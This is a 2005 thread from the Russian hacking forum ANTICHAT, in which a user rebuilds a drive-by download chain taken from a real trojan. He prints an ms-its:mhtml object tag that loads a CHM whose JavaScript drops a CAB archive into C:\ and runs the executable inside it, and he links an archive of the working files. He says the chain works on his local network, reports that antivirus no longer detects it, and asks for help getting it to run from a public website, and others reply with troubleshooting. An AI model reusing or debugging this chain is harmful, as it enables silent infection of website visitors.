HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Безопасность и Анонимность > Windows
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Запуск exe прямо с сайта
  #1  
Старый 11.12.2005, 00:18
vvs777
Познавший АНТИЧАТ
Регистрация: 16.11.2004
Сообщений: 1,257
С нами: 11305766

Репутация: 454


Exclamation Запуск exe прямо с сайта

Когда-то подцепил вирус Mediket. Что он делает так и не понял, но появляется в виде каба в корне диска C. EXEшник из каба запускается.
Потом еще пару раз цеплял другие его моды. Надоело мне все это, захотел разобраться как он ко мне попадает. Вот что нашел. На каком-то сайте лежит
(как его обозвал Касперский) Trojan-downloader.JS.small.bp. Это просто яваскрипт, который в конечном итоге пишет строчку типа
Код:
<object data=  "ms-its:mhtml:file://C:cust20cust.mht!http://localhost/bomba.chm::/bomba.htm" type="text/x-scriptlet"></object>
bomba.chm определяется как Trojan-downloader.JS.Psyme.bi
в нем единственный файл bomba.htm, в котором находжится очень извращенный яваскрипт, одна часть которого грузит cab-архив в c:\, потом запускает через object, а другая получает имена всех подпапок из Temporary Internet files и пробует запустить другой архив из каждой.
В архиве лежит exe-шник и инф-файл, запускающий его.
Кстати, все названия файлов выглядели типа eied_s7.chm итп, я их заменил. Сайт заменил на локалхост.
====
Так вот. Поставил себе самописный сервак на делфи, открываю страницу http://localhost/launch.htm в IE. Все в порядке, через пару секунд запускается программа на делфи (окно и кнопка, по которой зацикливание).
Значит, код работает. Аналогично когда localhost заменен на ip соседнего компа сети.
Когда я поменял везде localhost на мой тест-сайт develop.hut1.ru, пытаюсь запустить все это из интернета, нифига не запускается. Кажется, дело не доходит до chm-файла.
Может, кто-то увидит, из-за чего?
Код все таки интересный. Заходишь на сайт и тебе сразу троян. И каспер уже не палит.

Архив с этой байдой КАЧАТЬ ТУТ
PS: Использовался cabarc.exe, блокнот, IE, htm2chm, Delphi и может что забыл.

Последний раз редактировалось vvs777; 11.12.2005 в 00:24.. Причина: Забыл файл.
 
Ответить с цитированием

  #2  
Старый 23.12.2005, 01:16
vvs777
Познавший АНТИЧАТ
Регистрация: 16.11.2004
Сообщений: 1,257
С нами: 11305766

Репутация: 454


По умолчанию

Глухо. Может, не в тот раздел кинул?
 
Ответить с цитированием

кажется из-за!
  #3  
Старый 23.12.2005, 08:18
Dread
Познающий
Регистрация: 04.12.2005
Сообщений: 31
С нами: 10753767

Репутация: 5
По умолчанию кажется из-за!

Цитата:
Сообщение от vvs777  
Когда-то подцепил вирус Mediket. Что он делает так и не понял, но появляется в виде каба в корне диска C. EXEшник из каба запускается.
Потом еще пару раз цеплял другие его моды. Надоело мне все это, захотел разобраться как он ко мне попадает. Вот что нашел. На каком-то сайте лежит
(как его обозвал Касперский) Trojan-downloader.JS.small.bp. Это просто яваскрипт, который в конечном итоге пишет строчку типа
Код:
<object data=  "ms-its:mhtml:file://C:cust20cust.mht!http://localhost/bomba.chm::/bomba.htm" type="text/x-scriptlet"></object>
bomba.chm определяется как Trojan-downloader.JS.Psyme.bi
в нем единственный файл bomba.htm, в котором находжится очень извращенный яваскрипт, одна часть которого грузит cab-архив в c:\, потом запускает через object, а другая получает имена всех подпапок из Temporary Internet files и пробует запустить другой архив из каждой.
В архиве лежит exe-шник и инф-файл, запускающий его.
Кстати, все названия файлов выглядели типа eied_s7.chm итп, я их заменил. Сайт заменил на локалхост.
====
Так вот. Поставил себе самописный сервак на делфи, открываю страницу http://localhost/launch.htm в IE. Все в порядке, через пару секунд запускается программа на делфи (окно и кнопка, по которой зацикливание).
Значит, код работает. Аналогично когда localhost заменен на ip соседнего компа сети.
Когда я поменял везде localhost на мой тест-сайт develop.hut1.ru, пытаюсь запустить все это из интернета, нифига не запускается. Кажется, дело не доходит до chm-файла.
Может, кто-то увидит, из-за чего?
Код все таки интересный. Заходишь на сайт и тебе сразу троян. И каспер уже не палит.

Архив с этой байдой КАЧАТЬ ТУТ
PS: Использовался cabarc.exe, блокнот, IE, htm2chm, Delphi и может что забыл.
кажется из-за "file://" если его убрать на localhost'e то exe и тут не запустится!!!
 
Ответить с цитированием

  #4  
Старый 23.12.2005, 17:16
nerezus
Флудер
Регистрация: 12.08.2004
Сообщений: 3,791
С нами: 11444066

Репутация: 2290


По умолчанию

теоретически никак
 
Ответить с цитированием

  #5  
Старый 25.12.2005, 00:54
vvs777
Познавший АНТИЧАТ
Регистрация: 16.11.2004
Сообщений: 1,257
С нами: 11305766

Репутация: 454


По умолчанию

Не, я гарантирую что это должно работать. С того американского сервака этот вирусяка мне же приплыл когда-то? И file там вроде не должен быть...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Движок сайта МГПИ - спёкся! n4r0$ Болталка 6 27.03.2009 11:43
ваше мнение о дизайне сайта inxaoc Уязвимости 12 29.11.2005 19:34
Безопастость сайта определит браузер PSalm69 Мировые новости. Обсуждения. 2 28.11.2005 08:44
Смешное название сайта XgLuiR Болталка 2 12.11.2005 16:07



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...